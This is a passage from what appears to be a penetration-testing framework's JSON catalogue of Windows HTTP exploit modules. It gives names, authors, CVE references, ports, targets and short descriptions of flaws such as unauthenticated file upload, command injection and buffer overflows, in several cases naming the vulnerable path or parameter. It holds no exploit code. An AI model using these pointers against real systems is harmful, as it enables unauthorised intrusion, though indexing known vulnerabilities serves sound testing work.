"description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has a file upload vulnerability that can be exploited by an\n unauthenticated remote attacker to execute code as the SYSTEM user.\n Two servlets are vulnerable, FileUploadController (located at\n /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).\n This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and\n 1.1.0.13.",
"references": [
"CVE-2016-1525",
"US-CERT-VU-777024",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt",
"URL-https://seclists.org/fulldisclosure/2016/Feb/30"
],
"platform": "Windows",
"arch": "x86",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NETGEAR ProSafe Network Management System 300 / Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/http/netgear_nms_rce.rb",
"is_install_path": true,
"ref_name": "windows/http/netgear_nms_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/novell_imanager_upload": {
"name": "Novell iManager getMultiPartParameters Arbitrary File Upload",
"full_name": "exploit/windows/http/novell_imanager_upload",
"rank": 600,
"disclosure_date": "2010-10-01",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability which\n allows remote attackers to upload and execute arbitrary code.\n\n PortalModuleInstallManager",
"references": [
"OSVDB-68320",
"ZDI-10-190",
"URL-http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal Windows Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/novell_imanager_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/novell_imanager_upload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/novell_mdm_lfi": {
"name": "Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability",
"full_name": "exploit/windows/http/novell_mdm_lfi",
"rank": 600,
"disclosure_date": "2013-03-13",
"type": "exploit",
"author": [
"steponequit",
"Andrea Micalizzi (aka rgod)"
],
"description": "This module exercises a vulnerability in Novel Zenworks Mobile Management's Mobile Device Management component\n which can allow unauthenticated remote code execution. Due to a flaw in the MDM.php script's input validation,\n remote attackers can both upload and execute code via a directory traversal flaw exposed in the 'language'\n parameter of a POST call to DUSAP.php.",
"references": [
"CVE-2013-1081",
"OSVDB-91119",
"ZDI-13-087",
"URL-http://www.novell.com/support/kb/doc.php?id=7011895"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Novell Zenworks Mobile Device Management on Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/novell_mdm_lfi.rb",
"is_install_path": true,
"ref_name": "windows/http/novell_mdm_lfi",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/novell_messenger_acceptlang": {
"name": "Novell Messenger Server 2.0 Accept-Language Overflow",
"full_name": "exploit/windows/http/novell_messenger_acceptlang",
"rank": 200,
"disclosure_date": "2006-04-13",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in Novell GroupWise\n Messenger Server v2.0. This flaw is triggered by any HTTP\n request with an Accept-Language header greater than 16 bytes.\n To overwrite the return address on the stack, we must first\n pass a memcpy() operation that uses pointers we supply. Due to the\n large list of restricted characters and the limitations of the current\n encoder modules, very few payloads are usable.",
"references": [
"CVE-2006-0992",
"OSVDB-24617",
"BID-17503"
],
"platform": "Windows",
"arch": "",
"rport": 8300,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Groupwise Messenger DClient.dll v10510.37"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/novell_messenger_acceptlang.rb",
"is_install_path": true,
"ref_name": "windows/http/novell_messenger_acceptlang",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/nowsms": {
"name": "Now SMS/MMS Gateway Buffer Overflow",
"full_name": "exploit/windows/http/nowsms",
"rank": 400,
"disclosure_date": "2008-02-19",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Now SMS/MMS Gateway v2007.06.27.\n By sending a specially crafted GET request, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2008-0871",
"OSVDB-42953",
"BID-27896"
],
"platform": "Windows",
"arch": "",
"rport": 8800,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Now SMS/MMS Gateway v2007.06.27"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/nowsms.rb",
"is_install_path": true,
"ref_name": "windows/http/nowsms",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/octopusdeploy_deploy": {
"name": "Octopus Deploy Authenticated Code Execution",
"full_name": "exploit/windows/http/octopusdeploy_deploy",
"rank": 600,
"disclosure_date": "2017-05-15",
"type": "exploit",
"author": [
"James Otten <jamesotten1@gmail.com>"
],
"description": "This module can be used to execute a payload on an Octopus Deploy server given\n valid credentials or an API key. The payload is executed as a powershell script step\n on the Octopus Deploy server during a deployment.",
"references": [
"URL-https://octopus.com"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Powershell"
],
"mod_time": "2019-03-29 18:14:56 +0000",
"path": "/modules/exploits/windows/http/octopusdeploy_deploy.rb",
"is_install_path": true,
"ref_name": "windows/http/octopusdeploy_deploy",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/oracle9i_xdb_pass": {
"name": "Oracle 9i XDB HTTP PASS Overflow (win32)",
"full_name": "exploit/windows/http/oracle9i_xdb_pass",
"rank": 500,
"disclosure_date": "2003-08-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the authorization\n code of the Oracle 9i HTTP XDB service. David Litchfield,\n has illustrated multiple vulnerabilities in the Oracle\n 9i XML Database (XDB), during a seminar on \"Variations\n in exploit methods between Linux and Windows\" presented\n at the Blackhat conference.",
"references": [
"CVE-2003-0727",
"OSVDB-2449",
"BID-8375",
"URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Oracle 9.2.0.1 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/oracle9i_xdb_pass.rb",
"is_install_path": true,
"ref_name": "windows/http/oracle9i_xdb_pass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/oracle_beehive_evaluation": {
"name": "Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability",
"full_name": "exploit/windows/http/oracle_beehive_evaluation",
"rank": 600,
"disclosure_date": "2010-06-09",
"type": "exploit",
"author": [
"1c239c43f521145fa8385d64a9c32243",
"mr_me <steventhomasseeley@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Oracle BeeHive. The processEvaluation method\n found in voice-servlet can be abused to write a malicious file onto the target machine, and\n gain remote arbitrary code execution under the context of SYSTEM.",
"references": [
"CVE-2010-4417",
"ZDI-11-020",
"URL-http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html"
],
"platform": "Windows",
"arch": "",
"rport": 7777,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Oracle Beehive 2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/oracle_beehive_evaluation.rb",
"is_install_path": true,
"ref_name": "windows/http/oracle_beehive_evaluation",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/oracle_beehive_prepareaudiotoplay": {
"name": "Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload",
"full_name": "exploit/windows/http/oracle_beehive_prepareaudiotoplay",
"rank": 600,
"disclosure_date": "2015-11-10",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Oracle BeeHive. The prepareAudioToPlay method\n found in voice-servlet can be abused to write a malicious file onto the target machine, and\n gain remote arbitrary code execution under the context of SYSTEM. Authentication is not\n required to exploit this vulnerability.",
"references": [
"ZDI-15-550",
"URL-http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html"
],
"platform": "Windows",
"arch": "",
"rport": 7777,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Oracle Beehive 2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb",
"is_install_path": true,
"ref_name": "windows/http/oracle_beehive_prepareaudiotoplay",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/oracle_btm_writetofile": {
"name": "Oracle Business Transaction Management FlashTunnelService Remote Code Execution",
"full_name": "exploit/windows/http/oracle_btm_writetofile",
"rank": 600,
"disclosure_date": "2012-08-07",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits abuses the FlashTunnelService SOAP web service on Oracle\n Business Transaction Management 12.1.0.7 to upload arbitrary files, without\n authentication, using the WriteToFile method. The same method contains a directory\n traversal vulnerability, which allows to upload the files to arbitrary locations.\n\n In order to execute remote code two techniques are provided. If the Oracle app has\n been deployed in the same WebLogic Samples Domain a JSP can be uploaded to the web\n root. If a new Domain has been used to deploy the Oracle application, the Windows\n Management Instrumentation service can be used to execute arbitrary code.\n\n Both techniques have been successfully tested on default installs of Oracle BTM\n 12.1.0.7, Weblogic 12.1.1 and Windows 2003 SP2. Default path traversal depths are\n provided, but the user can configure the traversal depth using the DEPTH option.",
"references": [
"OSVDB-85087",
"BID-54839",
"EDB-20318"
],
"platform": "Java,Windows",
"arch": "",
"rport": 7001,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Oracle BTM 12.1.0.7 / Weblogic 12.1.1 with Samples Domain / Java",
"Oracle BTM 12.1.0.7 / Windows 2003 SP2 through WMI"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/oracle_btm_writetofile.rb",
"is_install_path": true,
"ref_name": "windows/http/oracle_btm_writetofile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/oracle_endeca_exec": {
"name": "Oracle Endeca Server Remote Command Execution",
"full_name": "exploit/windows/http/oracle_endeca_exec",
"rank": 600,
"disclosure_date": "2013-07-16",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability on the Oracle Endeca\n Server 7.4.0. The vulnerability exists on the createDataStore method from the\n controlSoapBinding web service. The vulnerable method only exists on the 7.4.0\n branch and isn't available on the 7.5.5.1 branch. In addition, the injection\n has been found to be Windows specific. This module has been tested successfully\n on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).",
"references": [
"CVE-2013-3763",
"BID-61217",
"OSVDB-95269",
"ZDI-13-190",
"URL-http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html"
],
"platform": "Windows",
"arch": "x64, x86",
"rport": 7770,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/oracle_endeca_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/oracle_endeca_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/oracle_event_processing_upload": {
"name": "Oracle Event Processing FileUploadServlet Arbitrary File Upload",
"full_name": "exploit/windows/http/oracle_event_processing_upload",
"rank": 600,
"disclosure_date": "2014-04-21",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability in Oracle Event Processing\n 11.1.1.7.0. The FileUploadServlet component, which requires no authentication, can be\n abused to upload a malicious file onto an arbitrary location due to a directory traversal\n flaw, and compromise the server. By default Oracle Event Processing uses a Jetty\n Application Server without JSP support, which limits the attack to WbemExec. The current\n WbemExec technique only requires arbitrary write to the file system, but at the moment the\n module only supports Windows 2003 SP2 or older.",
"references": [
"CVE-2014-2424",
"ZDI-14-106",
"BID-66871",
"URL-http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html"
],
"platform": "Windows",
"arch": "x86",
"rport": 9002,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/oracle_event_processing_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/oracle_event_processing_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/osb_uname_jlist": {
"name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",
"full_name": "exploit/windows/http/osb_uname_jlist",
"rank": 600,
"disclosure_date": "2010-07-13",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability\n in login.php. In conjunction with the authentication bypass issue,\n the 'jlist' parameter in property_box.php can be used to execute\n arbitrary system commands.\n This module was tested against Oracle Secure Backup version 10.3.0.1.0",
"references": [
"CVE-2010-0904",
"OSVDB-66338",
"ZDI-10-118"
],
"platform": "Windows",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/osb_uname_jlist.rb",
"is_install_path": true,
"ref_name": "windows/http/osb_uname_jlist",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/peercast_url": {
"name": "PeerCast URL Handling Buffer Overflow",
"full_name": "exploit/windows/http/peercast_url",
"rank": 200,
"disclosure_date": "2006-03-08",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.",
"references": [
"CVE-2006-1148",
"OSVDB-23777",
"BID-17040"
],
"platform": "Windows",
"arch": "",
"rport": 7144,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 English SP0-SP4",
"Windows 2003 English SP0-SP1",
"Windows XP English SP0/SP1",
"Windows XP English SP0/SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/peercast_url.rb",
"is_install_path": true,
"ref_name": "windows/http/peercast_url",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/php_apache_request_headers_bof": {
"name": "PHP apache_request_headers Function Buffer Overflow",
"full_name": "exploit/windows/http/php_apache_request_headers_bof",
"rank": 300,
"disclosure_date": "2012-05-08",
"type": "exploit",
"author": [
"Vincent Danen",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow in the CGI version of PHP\n 5.4.x before 5.4.3. The vulnerability is due to the insecure handling of the\n HTTP headers.\n\n This module has been tested against the thread safe version of PHP 5.4.2,\n from \"windows.php.net\", running with Apache 2.2.22 from \"apachelounge.com\".",
"references": [
"CVE-2012-2329",
"OSVDB-82215",
"BID-53455",
"URL-http://www.php.net/archive/2012.php#id2012-05-08-1",
"URL-http://www.php.net/ChangeLog-5.php#5.4.3",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=820000"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/php_apache_request_headers_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/php_apache_request_headers_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/privatewire_gateway": {
"name": "Private Wire Gateway Buffer Overflow",
"full_name": "exploit/windows/http/privatewire_gateway",
"rank": 200,
"disclosure_date": "2006-06-26",
"type": "exploit",
"author": [
"Michael Thumann <mthumann@ernw.de>"
],
"description": "This exploits a buffer overflow in the ADMCREG.EXE used\n in the PrivateWire Online Registration Facility.",
"references": [
"CVE-2006-3252",
"OSVDB-26861",
"BID-18647"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 English SP0",
"Windows 2000 English SP1",
"Windows 2000 English SP2",
"Windows 2000 English SP3",
"Windows 2000 English SP4",
"Windows 2003 English SP0/SP1",
"Debugging"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/privatewire_gateway.rb",
"is_install_path": true,
"ref_name": "windows/http/privatewire_gateway",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/psoproxy91_overflow": {
"name": "PSO Proxy v0.91 Stack Buffer Overflow",
"full_name": "exploit/windows/http/psoproxy91_overflow",
"rank": 200,
"disclosure_date": "2004-02-20",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow in the PSO Proxy v0.91 web server.\n If a client sends an excessively long string the stack is overwritten.",
"references": [
"CVE-2004-0313",
"OSVDB-4028",
"EDB-156",
"BID-9706"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 Pro SP0-4 English",
"Windows 2000 Pro SP0-4 French",
"Windows 2000 Pro SP0-4 Italian",
"Windows XP Pro SP0/1 English",
"Windows XP Pro SP2 English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/psoproxy91_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/psoproxy91_overflow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/rabidhamster_r4_log": {
"name": "RabidHamster R4 Log Entry sprintf() Buffer Overflow",
"full_name": "exploit/windows/http/rabidhamster_r4_log",
"rank": 300,
"disclosure_date": "2012-02-09",
"type": "exploit",
"author": [
"Luigi Auriemma",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in RabidHamster R4's web server.\n By supplying a malformed HTTP request, it is possible to trigger a stack-based\n buffer overflow when generating a log, which may result in arbitrary code\n execution under the context of the user.",
"references": [
"OSVDB-79007",
"URL-http://aluigi.altervista.org/adv/r4_1-adv.txt",
"URL-http://secunia.com/advisories/47901/"
],
"platform": "Windows",
"arch": "",
"rport": 8888,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"R4 v1.25"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/rabidhamster_r4_log.rb",
"is_install_path": true,
"ref_name": "windows/http/rabidhamster_r4_log",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/rejetto_hfs_exec": {
"name": "Rejetto HttpFileServer Remote Command Execution",
"full_name": "exploit/windows/http/rejetto_hfs_exec",
"rank": 600,
"disclosure_date": "2014-09-11",
"type": "exploit",
"author": [
"Daniele Linguaglossa <danielelinguaglossa@gmail.com>",
"Muhamad Fadzil Ramli <mind1355@gmail.com>"
],
"description": "Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a\n poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by\n using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b\n over Windows XP SP3, Windows 7 SP1 and Windows 8.",
"references": [
"CVE-2014-6287",
"OSVDB-111386",
"URL-https://seclists.org/bugtraq/2014/Sep/85",
"URL-http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/http/rejetto_hfs_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/rejetto_hfs_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sambar6_search_results": {
"name": "Sambar 6 Search Results Buffer Overflow",
"full_name": "exploit/windows/http/sambar6_search_results",
"rank": 300,
"disclosure_date": "2003-06-21",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Andrew Griffiths <andrewg@felinemenace.org>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow found in the\n /search/results.stm application that comes with Sambar 6.\n This code is a direct port of Andrew Griffiths's SMUDGE\n exploit, the only changes made were to the nops and payload.\n This exploit causes the service to die, whether you provided\n the correct target or not.",
"references": [
"CVE-2004-2086",
"OSVDB-5786",
"BID-9607"
],
"platform": "Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000",
"Windows XP"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/sambar6_search_results.rb",
"is_install_path": true,
"ref_name": "windows/http/sambar6_search_results",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sap_configservlet_exec_noauth": {
"name": "SAP ConfigServlet Remote Code Execution",
"full_name": "exploit/windows/http/sap_configservlet_exec_noauth",
"rank": 500,
"disclosure_date": "2012-11-01",
"type": "exploit",
"author": [
"Dmitry Chastuhin",
"Andras Kabai"
],
"description": "This module allows remote code execution via operating system commands through the\n SAP ConfigServlet without any authentication. This module has been tested successfully\n with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2.",
"references": [
"OSVDB-92704",
"EDB-24996",
"URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 50000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows generic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb",
"is_install_path": true,
"ref_name": "windows/http/sap_configservlet_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sap_host_control_cmd_exec": {
"name": "SAP NetWeaver HostControl Command Injection",
"full_name": "exploit/windows/http/sap_host_control_cmd_exec",
"rank": 200,
"disclosure_date": "2012-08-14",
"type": "exploit",
"author": [
"Michael Jordon",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability in the SAPHostControl\n Service, by sending a specially crafted SOAP request to the management console.\n\n In order to deal with the spaces and length limitations, a WebDAV service is\n created to run an arbitrary payload when accessed as a UNC path. Because of this,\n the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n It is enabled and automatically started by default on Windows XP SP3, but disabled\n by default on Windows 2003 SP2.",
"references": [
"OSVDB-84821",
"URL-http://www.contextis.com/research/blog/sap4/",
"URL-https://websmp130.sap-ag.de/sap/support/notes/1341333"
],
"platform": "Windows",
"arch": "",
"rport": 1128,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SAP NetWeaver 7.02 SP6 / Windows with WebClient enabled"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sap_host_control_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/sap_host_control_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sapdb_webtools": {
"name": "SAP DB 7.4 WebTools Buffer Overflow",
"full_name": "exploit/windows/http/sapdb_webtools",
"rank": 500,
"disclosure_date": "2007-07-05",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SAP DB 7.4 WebTools.\n By sending an overly long GET request, it may be possible for\n an attacker to execute arbitrary code.",
"references": [
"CVE-2007-3614",
"OSVDB-37838",
"BID-24773"
],
"platform": "Windows",
"arch": "",
"rport": 9999,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SAP DB 7.4 WebTools"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sapdb_webtools.rb",
"is_install_path": true,
"ref_name": "windows/http/sapdb_webtools",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/savant_31_overflow": {
"name": "Savant 3.1 Web Server Overflow",
"full_name": "exploit/windows/http/savant_31_overflow",
"rank": 500,
"disclosure_date": "2002-09-10",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service\n supports a maximum of 10 threads (for a default install). Each exploit attempt\n generally causes a thread to die whether successful or not. Therefore, in a default\n configuration, you only have 10 chances.\n\n Due to the limited space available for the payload in this exploit module, use of the\n \"ord\" payloads is recommended.",
"references": [
"CVE-2002-1120",
"OSVDB-9829",
"BID-5686",
"EDB-787"
],
"platform": "Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal Savant.exe",
"Windows 2000 Pro All - English",
"Windows 2000 Pro All - Italian",
"Windows 2000 Pro All - French",
"Windows XP Pro SP2 - English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/savant_31_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/savant_31_overflow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sepm_auth_bypass_rce": {
"name": "Symantec Endpoint Protection Manager Authentication Bypass and Code Execution",
"full_name": "exploit/windows/http/sepm_auth_bypass_rce",
"rank": 600,
"disclosure_date": "2015-07-31",
"type": "exploit",
"author": [
"Markus Wulftange",
"bperry"
],
"description": "This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager\n in order to achieve a remote shell on the box as NT AUTHORITY\\SYSTEM. The vulnerabilities\n include an authentication bypass, a directory traversal and a privilege escalation to\n get privileged code execution.",
"references": [
"CVE-2015-1486",
"CVE-2015-1487",
"CVE-2015-1489",
"URL-http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html"
],
"platform": "Windows",
"arch": "",
"rport": 8443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sepm_auth_bypass_rce.rb",
"is_install_path": true,
"ref_name": "windows/http/sepm_auth_bypass_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/serviio_checkstreamurl_cmd_exec": {
"name": "Serviio Media Server checkStreamUrl Command Execution",
"full_name": "exploit/windows/http/serviio_checkstreamurl_cmd_exec",
"rank": 600,
"disclosure_date": "2017-05-03",
"type": "exploit",
"author": [
"Gjoko Krstic(LiquidWorm) <gjoko@zeroscience.mk>",
"bcoles <bcoles@gmail.com>"
],
